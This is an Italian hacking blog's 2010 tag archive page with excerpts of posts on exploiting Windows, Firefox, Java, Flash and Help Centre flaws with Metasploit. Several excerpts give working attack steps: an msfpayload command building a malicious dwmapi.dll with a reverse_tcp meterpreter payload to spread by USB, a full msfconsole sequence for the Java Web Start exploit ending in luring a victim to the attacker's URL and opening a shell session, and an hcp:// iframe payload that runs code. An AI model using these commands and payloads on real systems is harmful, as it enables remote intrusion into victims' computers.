Hack | Clshack

Tag: ‘hack’

Tools for search DLL Hijacking Vulnerabilities

settembre 2nd, 2010 by clshack

Maggiori info su questa vulnerabilità, le possiamo trovare qui:

[DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit

Vediamo ora come cercare applicazioni vulnerabili :D

Sempre nell’articolo sopra citato, ho mostrato come con metasploit è possibile sfruttare questa vulnerabilità, sfruttando webdav, anche da remoto.

L’exploit creato da HD moore, sviluppatore metaploit è molto semplice.
Il codice che interessa a noi è:

                if (request.uri =~ /\.(dll|dl|drv|cpl)$/i)
                        print_status("#{cli.peerhost}:#{cli.peerport} GET => DLL Payload")
                        return if ((p = regenerate_payload(cli)) == nil)
                        data = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded)
                        send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
                        return
               end

(continua…)

Tags: dll, hack, linux, metasploit, remote, tool, Windows
Posted in Hacking, Software, Windows | 2 Comments »

[Metasploit] multi/handler :D

agosto 30th, 2010 by clshack

Sfruttando questa opzione di metasploit, possiamo mantenere in ascolto metasploit fino che il client non si connette al nostro server.

In poche parole, se mandiamo exploit in giro (ad esempio via usb) metasploit, resta in ascolto fino che l’utente non lo esegue…

Vediamo come attaccare firefox < = 3.6.8 con il DLL Hijacking e multi/handler di metasploit.

[info DLL Hijacking]

La dll che carica firefox all’esecuzione, è:
dwmapi.dll

Creiamo la falsa dll:
sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=IP D > dwmapi.dll
(continua…)

Tags: attack, dll, hack, linux, metasploit, usb
Posted in GNU/Linux, Hacking, Software | No Comments »

[CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction

luglio 28th, 2010 by clshack

Ne parlano quasi tutti, però non tutti sanno che è uscito il modulo, per sfruttare questo exploit con metasploit :D
Stuxnet, è un worm che si sta diffondendo sempre più velocemnte, sfruttando la vulnerabilità:CVE-2010-2568 che sfrutta una solita cattiva gestione dei file LNK di windows, permettendo ad attaccker di eseguire codice remoto sulla vittima, oppure propagando i file maligni tramite supporti rimovibili.

I prodotti vulnerabili, sono:

Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
Windows Vista Service Pack 1 and Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems
Windows Server 2008 R2 for Itanium-based Systems

Vediamo come sfruttare questa vulnerabilità con metasploit :D
(continua…)

Tags: attack, hack, linux, metasploit, vulnerability, Windows
Posted in GNU/Linux, Hacking, Software | 17 Comments »

Google (in)security ? o.O

luglio 10th, 2010 by clshack

E’ 10 giorni che ho la febbre non passa più porco cazzo merda aaaaaaaaa poi con sto caldo di merda aaaaaaaa vabbè.

Dicono che alla segnalazione di bug, rispondano così:

Si, è vero, è un bug, ma non sappiamo come patchare.. hai qualche suggerimento?

Stiamo parlando della google security, non penso siano così idioti.

Però, sinceramente non stanno molto attenti alla sicurezza.

Un paio di anni fa’, evilsocket, ha dimostrato che caricando su igoogle Gadgets fatto ad hoc, è possibile prendere il controllo del browser della vittima.

Evil, faceva solo un alert(document.cookie), ma se avesse inserito script come beef ?o.O

Tutto questo perchè google non effettua un controllo sui Gadgets caricati dagli utenti.

D’altronde non può nemmeno controllare a mano i tantissimi Gadgets che vengono caricati giornalmente.

Questo problema è valido anche per le estensioni di google chrome oppure di firefox, dove è stato trovato un worm.
(continua…)

Tags: estensione, google, hack
Posted in Hacking | 6 Comments »

[Metasploit]Sun Java Web Start Plugin Remote Code Excution

giugno 27th, 2010 by clshack

Exploit, abbastanza vecchio, CVE-2010-0886, ma ne parlo lo stesso per un ovvio motivo.

Se siete su windows, account limitato, java NON SI AGGIORNA, al meno che non abbiate la password di amministrator.
Problema al quanto risolvibile, almeno per me, ma non per molti altri.

Soluzioni contro questo exploit ?
Upgrade to J2SE 1.4.2_07 Upgrade to J2SE 5.0 Update 2

Ma se uno è utente limitato come fa ad aggiornare, al meno che non ci sia un server che distribuisca e installa gli aggiornamenti all’avvio/spegnimento di windows, cosa rara, gli utenti sono tutti FOTTUTI.

Vediamo come usare questo exploit, in metasploit:
sudo svn update
sudo ./msfconsole
use windows/browser/java_ws_arginject_altjvm
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST YOUR_IP
set SRVPORT 80

Se avete apache:
sudo service apache2 stop

set URIPATH /
exploit
Output simile:
[*] Exploit running as background job. [*] Started reverse handler on 192.168.1.39:4444 [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://192.168.1.39:80/ [*] Server started.

Ora facciamo visitare alla vittima:
http://YOUR_IP:80
Output simile:
[*] Request for "/" does not contain a sub-directory, redirecting to /X2EbB9v10GNe/ ... [*] Responding to "GET /X2EbB9v10GNe/" request from 192.168.1.154:1105 [*] Sending js detection HTML to 192.168.1.154:1105... [*] Responding to "GET /X2EbB9v10GNe/ijIcZf4C.shtml" request from 192.168.1.154:1105 [*] Sending JS version HTML to 192.168.1.154:1105...

E se tutto va bene:
sessions -i 1

e vi si pare meterpreter :D

Tags: attack, exploit, hack, java, metasploit
Posted in Hacking | 5 Comments »

[tutorial]Tool for Privilege Escalation

giugno 23rd, 2010 by clshack

Letture consigliate:
[tutorial]Tool for Information Gathering
[tutorial]Tool for Network Mapping

[tutorial]Tool for Vulnerability Identification level Server
[tutorial]Tool for Vulnerability Identification level WEB

Da wikipedia, leggiamo:

Privilege escalation o in italiano scalata dei privilegi è l’atto di sfruttare una falla in un software applicativo per ottenere l’accesso a risorse che normalmente sarebbero protette da un’applicazione o dall’utente.
Il risultato è che l’applicazione esegue azioni con più privilegi di quelli dovuti e voluti dallo sviluppatore o dall’amministratore di sistema.

Pensate, ad esempio se su un server riuscissimo ad avere i privilegi root :D
In questo articolo, vedremo dei tools, che ci permettono di “scalare i privilegi”, cioè di ottenere privilegi root su linux e system su windows.
(continua…)

Tags: attack, guida, hack, kernel, linux, root, system, tool
Posted in GNU/Linux, Hacking, Software | 6 Comments »

[CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution

giugno 20th, 2010 by clshack

E dopo la gente, si chiede come fanno i virus ad entrare nei loro computer WINDOWS… fino che usate software buggati, per lo più lenti e schifosi, come flash player… speriamo che HTML 5 porti via tutto questo ;)

In tanto vediamo come sfruttare questa vulnerabilità per adobe flash palyer, con metasploit :D

Adobe Flash Player “newfunction” Invalid Pointer Use

CVE-2010-1297
This exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player.
Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code executiong is achieved by embedding a specially crafted Flash movie into a PDF document.
An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled.

Platforms Affected:

Adobe Acrobat 9.0 Standard
Adobe Acrobat 9.0
Adobe Acrobat 9.0.0
Adobe Acrobat 9.1
Adobe Acrobat 9.1 Standard

(continua…)

Tags: attack, exploit, flash, hack, metasploit, tool
Posted in GNU/Linux, Hacking, Software | 7 Comments »

[EXPLOIT]Windows Help Centre Remote code Excution

giugno 10th, 2010 by clshack

Un altro exploit per windows, che permette l’esecuzione di comandi sul pc della vittima.
Bisogna passare a linux :D

Ma vediamo come funziona questo exploit, chiamato:
Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

Questo exploit, sfruttando i file asx possiamo aprire il windows help con un url malformato e far aprire ad esempio la
calcolatrice :D

I file asx, sono:

An ASX file (Advanced Stream Redirector) is a special type of file which works closely with Windows Media ASF files.

L’url malformato in questione è composto cosi:
<iframe src="hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E">
(continua…)

Tags: exploit, hack, help, ie, oday, remote, Windows
Posted in Hacking, Software, Windows | 1 Comment »

[tutorial]Tool for Vulnerability Identification level Server

giugno 9th, 2010 by clshack

Dopo queste:
[tutorial]Tool for Network Mapping
[tutorial]Tool for Information Gathering
Ora parleremo di Tool for Vulnerability Identification level Server.

Categoria distinta a livello server, non farò come in backtrack che mettono tutto assieme, tool per l’sql injection assieme a tool per l’exploited di vulnerabilità a livello server, cioènon di applicazzioni web, per quello che posso cerco di dividere.
Penso che dopo si capisca anche meglio…
Sicuramente, non metterò mai tool come wapiti insieme a tool come openvas.

Per questa categoria, ho selezionato questi tools:

nessus
openvas
Checkpwd
Nikto
OpenSSL-Scanner
Onesixtyone
ettercap
medusa2

Purtroppo non posso soffermarmi su tutti questi ottimi tool, comunque il loro funzionamento è abbastanza semplice :D e se googlate un po’ troverete :D
(continua…)

Tags: hack, lan, linux, reti, server, Software, tool
Posted in GNU/Linux, Software, Windows | 1 Comment »

ClsHack.it

Tag: ‘hack’

Tools for search DLL Hijacking Vulnerabilities

[Metasploit] multi/handler :D

[CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction

Google (in)security ? o.O

[Metasploit]Sun Java Web Start Plugin Remote Code Excution

[tutorial]Tool for Privilege Escalation

[CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution

[EXPLOIT]Windows Help Centre Remote code Excution

[tutorial]Tool for Vulnerability Identification level Server

Rimani aggiornato:

Ultimi articoli:

Tag:

Info:

Disclamer:

Blog Amici:

Link che seguo: